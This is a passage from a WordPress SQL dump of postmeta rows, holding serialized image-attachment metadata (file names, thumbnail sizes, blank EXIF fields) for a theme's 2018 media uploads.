height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"h7-port-img-12-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"h7-port-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51788,2052,'_wp_attachment_image_alt','m'),(51789,2657,'_wp_attached_file','2018/09/landing-first-backround.jpg'),(51790,2657,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1200;s:4:\"file\";s:35:\"2018/09/landing-first-backround.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-first-backround-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"landing-first-backround-1024x640.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-first-backround-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"landing-first-backround-768x480.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:36:\"landing-first-backround-1536x960.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:960;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:35:\"landing-first-backround-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:36:\"landing-first-backround-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:36:\"landing-first-backround-650x1200.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:37:\"landing-first-backround-1300x1200.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-first-backround-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"landing-first-backround-600x375.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-first-backround-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"landing-first-backround-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"landing-first-backround-600x375.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-first-backround-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51791,2053,'_wp_attached_file','2018/08/h3-rev-img-4.png'),(51792,2053,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:229;s:6:\"height\";i:551;s:4:\"file\";s:24:\"2018/08/h3-rev-img-4.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"h3-rev-img-4-125x300.png\";s:5:\"width\";i:125;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"h3-rev-img-4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"h3-rev-img-4-229x375.png\";s:5:\"width\";i:229;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"h3-rev-img-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"h3-rev-img-4-229x375.png\";s:5:\"width\";i:229;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"h3-rev-img-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51793,2053,'_wp_attachment_image_alt','m'),(51794,2352,'_wp_attachment_image_alt','m'),(51795,2772,'_wp_attached_file','2018/09/landing-img-11.jpg'),(51796,2772,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:26:\"2018/09/landing-img-11.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"landing-img-11-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"landing-img-11-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"landing-img-11-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"landing-img-11-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"landing-img-11-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"landing-img-11-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"landing-img-11-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"landing-img-11-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51797,2657,'_wp_attachment_image_alt','x'),(51798,2750,'_wp_attached_file','2018/09/landing-vector-img-6.png'),(51799,2750,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:357;s:6:\"height\";i:337;s:4:\"file\";s:32:\"2018/09/landing-vector-img-6.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-6-300x283.png\";s:5:\"width\";i:300;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-6-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"landing-vector-img-6-300x337.png\";s:5:\"width\";i:300;s:6:\"height\";i:337;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-6-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-6-300x337.png\";s:5:\"width\";i:300;s:6:\"height\";i:337;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-6-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51800,2120,'_wp_attached_file','2018/08/opening-hours-single-img.jpg'),(51801,2120,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:330;s:6:\"height\";i:258;s:4:\"file\";s:36:\"2018/08/opening-hours-single-img.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"opening-hours-single-img-300x235.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"opening-hours-single-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"opening-hours-single-img-300x258.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"opening-hours-single-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:36:\"opening-hours-single-img-300x258.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"opening-hours-single-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51802,2120,'_wp_attachment_image_alt','d'),(51803,2772,'_wp_attachment_image_alt','m'),(51804,2786,'_wp_attached_file','2018/09/landing-vector-img-15.png'),(51805,2786,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:418;s:6:\"height\";i:520;s:4:\"file\";s:33:\"2018/09/landing-vector-img-15.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-15-241x300.png\";s:5:\"width\";i:241;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-15-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"landing-vector-img-15-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-15-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-15-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-vector-img-15-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51806,2353,'_wp_attached_file','2018/08/h7-port-img-9-1.jpg'),(51807,2353,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:27:\"2018/08/h7-port-img-9-1.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"h7-port-img-9-1-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"h7-port-img-9-1-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"h7-port-img-9-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"h7-port-img-9-1-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:28:\"h7-port-img-9-1-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:27:\"h7-port-img-9-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:28:\"h7-port-img-9-1-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:28:\"h7-port-img-9-1-650x1100.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:29:\"h7-port-img-9-1-1300x1100.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"h7-port-img-9-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"h7-port-img-9-1-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"h7-port-img-9-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"h7-port-img-9-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"h7-port-img-9-1-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"h7-port-img-9-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51808,2664,'_wp_attached_file','2018/09/landing-first-character.png'),(51809,2664,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:460;s:6:\"height\";i:415;s:4:\"file\";s:35:\"2018/09/landing-first-character.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-first-character-300x271.png\";s:5:\"width\";i:300;s:6:\"height\";i:271;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-first-character-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-first-character-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-first-character-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"landing-first-character-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-first-character-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51810,2135,'_wp_attached_file','2018/08/h1-img-13.jpg'),(51811,2135,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1;s:6:\"height\";i:43;s:4:\"file\";s:21:\"2018/08/h1-img-13.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51812,2135,'_wp_attachment_image_alt','m'),(51813,2786,'_wp_attachment_image_alt','v'),(51814,2664,'_wp_attachment_image_alt','c'),(51815,2773,'_wp_attached_file','2018/09/landing-img-12.jpg'),(51816,2773,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:26:\"2018/09/landing-img-12.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"landing-img-12-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"landing-img-12-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"landing-img-12-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"landing-img-12-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"landing-img-12-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"landing-img-12-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"landing-img-12-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"landing-img-12-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51817,2750,'_wp_attachment_image_alt','f'),(51818,2794,'_wp_attached_file','2018/09/landing-pop-up-opener-top.png'),(51819,2794,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:48;s:6:\"height\";i:30;s:4:\"file\";s:37:\"2018/09/landing-pop-up-opener-top.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51820,2794,'_wp_attachment_image_alt','b'),(51821,2164,'_wp_attached_file','2018/08/Sequence-1.mp4'),(51822,2665,'_wp_attached_file','2018/09/landing-first-rectangle.jpg'),(51823,2665,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:388;s:6:\"height\";i:123;s:4:\"file\";s:35:\"2018/09/landing-first-rectangle.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"landing-first-rectangle-300x95.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:95;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-first-rectangle-150x123.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-first-rectangle-300x123.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-first-rectangle-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"landing-first-rectangle-300x123.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-first-rectangle-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51824,2164,'_wp_attachment_metadata','a:10:{s:8:\"filesize\";i:723644;s:9:\"mime_type\";s:9:\"video/mp4\";s:6: